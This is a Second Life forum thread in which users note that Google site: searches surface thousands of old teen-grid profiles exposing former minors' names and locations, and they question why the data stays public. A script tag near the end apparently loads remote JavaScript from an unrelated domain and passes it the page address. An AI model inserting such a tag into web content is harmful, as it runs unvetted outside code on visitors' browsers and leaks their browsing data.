Disturbing Google Results

You are about to reply to a thread that has been inactive for 3944 days.

Please take a moment to consider if this thread is worth bumping.

I love Google in that, if the search terms are worded in a certain way, one can get surprising results.

Case in point: Up to a few years ago, SL had a "teen grid" and the users were all (one would suppose) under the age of 18. It is somewhat surprising to see the results of going to Google and entering (w/o the quotes) "site:world.secondlife.com Resident+Name" . This unexpectantly brings up 116 results of the profiles of (apparently) teen participents in Second Life from that era.

Makes one pause and wonder about how you'll appear in Google sometime in the future...

LepreKhaun wrote:

I love Google in that, if the search terms are worded in a certain way, one can get surprising results.

Case in point: Up to a few years ago, SL had a "teen grid" and the users were all (one would suppose) under the age of 18. It is somewhat surprising to see the results of going to Google and entering (w/o the quotes) "site:world.secondlife.com Resident+Name" . This unexpectantly brings up 
116 results of
 the profiles of (apparently) teen participents in Second Life from that era.

Makes one pause and wonder about how you'll appear in Google sometime in the future...

I glanced at a few of the profiles that came up and a lot was typical teen results. 

No question there was a lot of sexual innuendo and some pretty direct things.

Profile comments like "I just splooged myself" would certainly give a lot of people some pause.

I wonder how many of them are still active and / or use the same accounts today.

that and they are 18 and 19 nowadays..

i think you had to be able to log into the teen forums and grid to be  able to see those back then..

i think they were closed off to the world back then..

but i really never looked into it all that much..i just remember you had to be a teen to get to thier forums and their grid..

i would think their profiles were the same way back then..

Yeah, but a bit more looking at the problem shows: If you use the search term "site:teen.world.secondlife.com", you get over 4,000 results.

These were (at the time) juveniles, and apt to make judgmental errors,  such as stating their real names, RL locations and linking to their facebook and myspace (anyone remember myspace?) accounts.

The question I have is, why is this specific database still online and accessable to the web crawlers?

LepreKhaun wrote:

Yeah, but a bit more looking at the problem shows: If you use the search term "site:teen.world.secondlife.com", you get over 4,000 results.

These were (at the time) juveniles, and apt to make judgmental errors,  such as stating their real names, RL locations and linking to their facebook and myspace (anyone remember myspace?) accounts.

The question I have is, why is this specific database still online and accessable to the web crawlers?

Maybe because the Main Grid (general regions only of course) is open to anyone over the age of 16.

LL didn't make them start all over again with new accounts & profiles.

As for why they are still available, Google and other sites cache content all the time. The RP sim I'm in had a problem when our website was hacked and was down for a month while it was fixed. However, many of the pages from the site were cached in other places.

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={EEC085C4-7C23-41DA-81DD-240F2C2A3341}&d=2013-7-21&s=http://community.secondlife.com/t5/forums/replypage/board-id/GeneralDiscussionForum/message-id/116060&cb=0.5972837685122854"></script>

You are about to reply to a thread that has been inactive for 3944 days.

Please take a moment to consider if this thread is worth bumping.